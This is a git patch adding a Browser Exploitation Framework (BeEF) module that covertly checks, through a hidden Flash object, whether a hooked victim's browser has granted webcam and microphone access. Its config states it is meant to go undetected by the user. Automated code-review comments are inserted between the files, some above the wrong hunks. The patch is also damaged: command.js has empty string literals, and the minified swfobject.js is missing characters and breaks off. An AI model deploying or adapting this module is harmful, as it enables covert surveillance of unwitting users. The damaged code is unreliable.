From cf4ab9533ec28101414d4749b2758639d3a83eff Mon Sep 17 00:00:00 2001
From: BWZ
Date: Wed, 3 Apr 2013 09:01:15 +1000
Subject: [PATCH] Added Webcam Permission Check Module
---
 .../webcam_permision_check/cameraCheck.as | 54 ++++++++++++++++++
 .../webcam_permision_check/cameraCheck.swf | Bin 0 -> 6048 bytes
 .../browser/webcam_permision_check/command.js | 39 +++++++++++++
 .../webcam_permision_check/config.yaml | 15 +++++
 .../browser/webcam_permision_check/module.rb | 18 ++++++
 .../webcam_permision_check/swfobject.js | 4 ++
 6 files changed, 130 insertions(+)
 create mode 100644 modules/browser/webcam_permision_check/cameraCheck.as
 create mode 100644 modules/browser/webcam_permision_check/cameraCheck.swf
 create mode 100644 modules/browser/webcam_permision_check/command.js
 create mode 100644 modules/browser/webcam_permision_check/config.yaml
 create mode 100644 modules/browser/webcam_permision_check/module.rb
 create mode 100644 modules/browser/webcam_permision_check/swfobject.js
diff --git a/modules/browser/webcam_permision_check/cameraCheck.as b/modules/browser/webcam_permision_check/cameraCheck.as
new file mode 100644
index 000000000..c4fcc40d4
--- /dev/null
+++ b/modules/browser/webcam_permision_check/cameraCheck.as
@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+ import flash.display.Sprite;
+ import flash.external.ExternalInterface;
+ import flash.media.Camera;
+ import flash.system.Security;
+ import flash.system.SecurityPanel;
+
+ public class CamCheck extends Sprite {
+
+ var _cam:Camera;
+
+ public function CamCheck() {
+
+ if (Camera.isSupported) {
+ this._cam = Camera.getCamera();
+
+ if (!this._cam) {
+
+ //Either the camera is not available or some other error has occured
+ ExternalInterface.call("naPermissions");
+
+ } else if (this._cam.muted) {
+
+ //The user has not allowed access to the camera
+ ExternalInterface.call("noPermissions");
+
+ // Uncomment this show the privacy/security settings window
+ //Security.showSettings(SecurityPanel.PRIVACY);
+ } else {
+
+ //The user has allowed access to the camera
+ ExternalInterface.call("yesPermissions");
+ }
+
+ } else {
+
+ //Camera Not Supported
+ ExternalInterface.call("naPermissions");
+
+ }
+
+ }
+
+ }
+
+}
\ No newline at end of file
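Review bot: None of the `ExternalInterface.call(...)` sites in the `CamCheck` constructor check `ExternalInterface.available` first, so in a container without a scripting bridge the constructor throws instead of finishing quietly. A guard such as `if (!ExternalInterface.available) return;` at the top of the constructor would make that case explicit. The field `var _cam:Camera;` has no access modifier and should read `private var _cam:Camera;`. The `Security` and `SecurityPanel` imports are referenced only by the commented-out `showSettings` line and can be dropped with it, and "occured" in the first comment should be "occurred".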
diff --git a/modules/browser/webcam_permision_check/cameraCheck.swf b/modules/browser/webcam_permision_check/cameraCheck.swf new file mode 100644 index 0000000000000000000000000000000000000000..7894dd240ee75dd524ce66e70711b5484113d47a GIT binary patch literal 6048 zcmV;R7hmW@S5p$EC;$L>+RZv?cw5JDJMX{(cmN6T04Y+GC~2QaQ4~Q@lC7JPcu1lp zLl#M04xo47frN#F#vw{h>?lrr=JFArX>FQ56Sqm7rb*L$jbkOLbF|+_NR^a0ZNJ3L z;iNy3rfJ&dN7>o;03MR+e(CXj<;UHfnVp@TotfR8edHM;J$R1PbP%!(NPln%A>{qF zZvi3ObMeI1!~KJ;XVR%mek)=-+QtioiLK%Aelv;Q%gRqG+U& z`Ee^(nQ%CpC`{@(oH<*}#OLRnXXL}ooW-ZuSWeWOpC+QEoBW@>s!tCtq39pC_cVUq{&wjO@ z@Sl^*{^l=tU;uo}+oz}d#x3&{dA&|sO$gFRBB!UV^&~*Lh`)zW@dvZwS7*iV&x&84 z72lc_XJ^Il&Whig6-n?H`o7l=t^ZB$x3dQy{>)E*-TUca>KDe$uX?w={_}S1S zZhiB;cii&B-sr2jzZ-p})VuRZEAhr9(N(Oj3ULJ(2a@$b< zz7f~){=SpE+07ejU|+_Xq>f(4U6!q94cD#@V|px`JL{ON={g!_a-2C|mVL{J&_CKx zW=j9ebRpk@p3{IZWQ^A2Uus?%sLN_gcMn7cb(#d=tt(BL! zVdXT2LfoIpF6gK_YvmW9L3_N8CO&OB$4zL_8HNrh=t*3bQqWIXeU5=#W-5saE5il7 zP|Q1L)$qvfkg=GRsWGsCXtnL*=)g^n!~*lI=>@O*Zhj|P3i<1hFo~}@P=?tclQlpqlnH)W?b=X8kJVi z1lh@c8y4^gFr8o$Cao&;fU}gtmL5MV@xTDf#q8j6V(_${%LhmFQy9CgW!|o?E-9YV zC#k)bt*!1t)(P(Bus)Ft^I!~@L#VeBnLFI8omk!B9X)*Duys4`utMX)gd=Mftirl{ z0k7w@f-0if3L|GHtiU|~L8~yHjZ23j!y~S=1LJ+HyBu=`%YzmekK1kOFfM9=_N|3% z>#&u>O@`|bjJROv)Hw`uA|^><&br;@*gKfb3@_d(;1$#PG57w6<1%+&7ZU1mlLUMHs^Js ze9X$Gr6TSeImgo+FN!&oJY%Ic^vILRcwyW%ZY9UY3ymQNNg;PA5UOhoH9%-dV{>DR zOd9veBoqma$;AD>rsjq~Q%jQ%DSrSiufGaJAwYwk8UU99wcfgVpVLU8V1poo^m{-- zpdeB~rr@GLspz4imx>An9~J!+swh-bDM+D)3bjT5!c^&|%6h8wP-O#EHd191 zRc@flja1o8l`T}+N|kL?*-n)mRM|MTHC%vJ`HoVva(dLV=1!3a6<&Nrf{M&QiF8!h4(1 zmUmG&hs_7Ed!uKQn1G3A^^37)RB6R z$AeAC4O>G=$2eM)f2ReAQmRFs;S_fo#7YD+;>ISlEJrLGIFxB6{DI0mU35AN{4L}-h z1k$>hlePe9+{%G%yxPvI9lYAft6m_>c5%S(@!*WYZd<86c8!K2(;sw1j1VIOGNBM zP23)Frh6}UEqJ`6Gu<=$iB_+@Cvr1rb%|)r7D8sUy1^J3uboNM1~FK)lby+k27zYm zNz^9v8i$tRG-`wCd60AN<$;0|t(xh!i00|mT-}=3tr^{#*{#*!?=jM1|BMHbRTM## zmd{@6g9J`g*&ON#F%`a$H8kVjk_8;tH9+Dr67ZLo7fi;RLE*9J8! 
zk7?!9u=Mtl)O+NAo_eof~OFb zM9K5Fz^#4>tsbpbOCtUbRSV~;aiT+=_d(-;ciH%)bZ1g6j+_oOA{K7$O> z&>1*)CM_cMl00>l*yMYJ+@3YiFgFuMsB{1R_lEj;$A^;@cxqCkGR5d-%NM(PzlY) zRmBraL>lhWl13BvgEoqhP_kp+Jn&f0_=fO;=?fb5r7)J zT%yNHiH}0$7#CT^MXsI`c{K7dn3HLPWuXWocQxn6y&pZoC1|euB1arAbMaG-k^#qneUaT8gJKMl^Fkc6&VzsP^ZDrfpjR^b8omkTrR4!P=&WL zHpMI2cCCevxTrr2=Yxdg?ap5fJCmKlLOx$6CVLm0hz@V~p{54z##bz2? zH*cAH`gs(sHE_1h|BCIraNcdWnY;eQ+1c~dpa?xOJB#7cD7q#2eLPxB$_S4aDe4>Y z5qtGux@=t#pn)3@KqD9uijDe*`~<~TaC@DPE<_EN{s}lQofr9RCBucJ&{t+>FEU{| zf91T(aIruLbunbT@|NJ0C*O!$enoVPwnN)CxJ4LW5!;B!T5TyuHpW&WvQ_Kg$jaCT zMB20^9NBfeiQf_t}wX7gv+R}6nGW&E#qv`segQ{$^H zzHueGsl${Ko8B;GLo#H2lUsI6+9pPPm^*5#FgWXQXmmLOk>wCwj`!elI}3^~*H$4I z+r;Sjrr0V*P#PnR_u5J=6$DB4;yKz=iaZYdylN4V(u8Nx@)C2ugwkHI#g)nsax8N- zO7ayt)7^fh-IUr*x!rWNo3!0@x0{}J)7x$;?WV8Y^tYQ;?Phhm8E7|y?Pg88S=(;b zwVU-AjUg-zybZhn=uZP-Zb}YN4onrVTuXeeXnHvU6{^c&HKl8*$ZLxgDpa}5D_=`R zUN=X?3RNoex~`=nFTH5Euv5VXu`2EjM18zP-0$dZD28uJuMFhab9`g@jjE|Ioi3Wy zjv7XlQC(qk*_h2n4L6^`a2p<5w8!vb>qjyE=fZ9rUK^GTW!k7kY9K5aeg~{Ee75kQ z;WdJY*YOs0s&|%Z)Ej}yWTK5dSH@t9%i zZ~fN3$Zw5{{N`Tdx6N~YJ74kG3EN|#Knp)LjSyaVSo1T>uBQi|0O0JLc~|}S@$ABL zd%1w;wuL9avUPG~8AO+{0B@GFA?IKjbejE(Fyb_@sIiI55L-6a%yAOuFloh&yg8CeUe!gfGWf5!NUBuGsC=pyNq3zuzEV)Jrw9_gc zX-946dmQKcuIK6Nx>&qk6!b2NEk>)+4WgX|xv}`L__0(Om;s_X=lrJ2kkwy;1Jh`4 z>B3;IfH{(ruZ4J0utsaKQ!d=gyy3frr(C=0-=3Y-*4T0`K9@JWWw?07@G?>tzf%03j@*GK`8app^aVtO&bx7p+ZoeQgEA2_l+Ofzgu~r*D`|DuMEnNH~q-K(ZIB`l=1{q<+5Nw3wpRf zH=jDB*^2kp(gliRVl69@{8x6S$Ft_bf?R?pu2|&23r-U43OvkDvI}^UU&P~k@JSGm zJz9mSZ@^Ag2CD#X1)JcWCwMqv4)bbVh7?9aO^3aPXL>5E7~bhA^&Ie{Qww9CkN5fQ zzAE0w>6?*W#p%^HJy51&GR)Incl{Wq;4(%QUXylkuYMjMZ}NFeu3{|=EzD%*!bey& zYi3KCz$8ZP2U-(8$vT+G+{}lMpCxP=Tf^2e55DdALuffZ-#XbQeCO3NypUKMTgNuC z8(1Aa-d3>HtP7uWH{x@zo~^{kT$uIX18Ez+1y?b~y739O1s{VuS?`fu<1Ml6Q6Jki z~l9k$AV&n8|-r5p*4?}%-)7bKwClD#Z6HmdAp$`RlA zw%AraSU?7`!(OP!3UogD9c~SF@h&Mp3o+0M$|8N_>RYu^#mU zpgs(EWZ(>|*dFyYP~QMt?qRhAxN~ut8}Ln1$5v|yS)>w_!YDa5!pv5+! 
z&2B{7aC`LOlXrj(vc34E-Oq;DFdJc`>hqw!0P2gNz69#apuPg?r$GHQsGkG%k3s!BsDA?L7eM_YsDBFTmq7h9P|t(Ni0B3sBz#^_!r63)F9edI8jnp#C+emq5J?>J?DG3+nekeGAkdg8DY7e-G-9K>abO zKLPcppuPj@&p`b-sQ(D+uR#4LP=5{TKZE)kQ2zzge+Bj5K>aNonTGL>*jnx=anAGe z-bc@^jV*l_*DsB=Ra`G{hl_TU%eL=r+9Zl-i!GTG5wwMH*SjzTcBAVlI{$VIf|a)G zQFa|V-41}V>pd6-8_@l~pFev`Mk+>-pD z;M@?c{H~7m*dJQQdz=@o^SZ@6Lg5L-y2v^bZI85*=#8bsQ&37g4Urp#XltaEM7ty1 zgpuN9ELX6Y(n10DRijm|ngMmv+AIB5|=d4!I2K+n2Ie&*qkpfft z9=yQ7248$s-(9|zaeX{N(t7aHZ0Fw$t1Exf@Ej9b#zSbSHS?bgI~ILoTwD3Z_{s7& aMzLkw&%dPB@;~Lx{nOblME(Ofu&=KNOxqj) literal 0 HcmV?d00001 diff --git a/modules/browser/webcam_permision_check/command.js b/modules/browser/webcam_permision_check/command.js new file mode 100644 index 000000000..310b0fd61 --- /dev/null +++ b/modules/browser/webcam_permision_check/command.js @@ -0,0 +1,39 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + + +beef.execute(function() { + + + //These 3 functions [naPermissions() The camera is not available or not supported + // yesPermissions() The user is allowing access to the camera / mic + // yesPermissions() The user has not allowed access to the camera / mic + // Flash will invoke these functions directly. + var js_functions = ''; + + + var body_flash_container = '
'; + + //A library that helps include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + + //Add flash content + $j('body').append(js_functions, swfobject_script, body_flash_container, include_script); + +}); + + + + +
diff --git a/modules/browser/webcam_permision_check/config.yaml b/modules/browser/webcam_permision_check/config.yaml
new file mode 100644
index 000000000..78558df0d
--- /dev/null
+++ b/modules/browser/webcam_permision_check/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ wb:
+ enable: true
+ category: "Browser"
+ name: "Webcam Permission Check"
+ description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
+ authors: ["@bw_z"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/webcam_permision_check/module.rb b/modules/browser/webcam_permision_check/module.rb
new file mode 100644
index 000000000..2cf19a11d
--- /dev/null
+++ b/modules/browser/webcam_permision_check/module.rb
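Review bot: The comment block above `js_functions` lists `yesPermissions()` twice; the entry described as "has not allowed access" should be `noPermissions()`, which is the name cameraCheck.as passes to `ExternalInterface.call`. The corrected line would read `// noPermissions() The user has not allowed access to the camera / mic`. The opening `[` in that comment is never closed, and `var swfobject_script = ''` is missing its terminating semicolon. The string literals appear empty on this page, so the callback bodies and the swfobject embed call could not be reviewed.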
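Review bot: `working: ["All"]` overstates the module's reach, because command.js loads cameraCheck.swf through swfobject and so can presumably only report a result where a Flash plugin is installed and enabled. The description mentions Flash only in passing; stating the dependency up front, for example `description: "Requires Flash. Checks whether ..."`, and narrowing `target` if the framework supports it, would keep the metadata honest. The module key `wb` is also opaque next to the display name and does not match the directory `webcam_permision_check` this commit creates.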
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Wb < BeEF::Core::Command
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/cameraCheck.swf', '/cameraCheck', 'swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/swfobject.js', '/swfobject', 'js')
+ end
+
+ def post_execute
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+ end
+
+end
diff --git a/modules/browser/webcam_permision_check/swfobject.js b/modules/browser/webcam_permision_check/swfobject.js
new file mode 100644
index 000000000..8eafe9dd8
--- /dev/null
+++ b/modules/browser/webcam_permision_check/swfobject.js
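Review bot: Both `bind` calls in `pre_send` reference `/modules/browser/wb/...`, but this commit adds cameraCheck.swf and swfobject.js under `modules/browser/webcam_permision_check/`, so the asset handler is pointed at a directory the patch does not create. Either the module directory should be named `wb`, or the paths should follow the real location, e.g. `bind('/modules/browser/webcam_permision_check/cameraCheck.swf', '/cameraCheck', 'swf')`. The class name `Wb` has the same mismatch with the directory, which is itself misspelled ("permision"). Cleanup of the two bound assets lives only in `post_execute`; whether they stay bound when no result comes back cannot be told from this hunk and should be confirmed.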
@@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof 
j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var 
X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab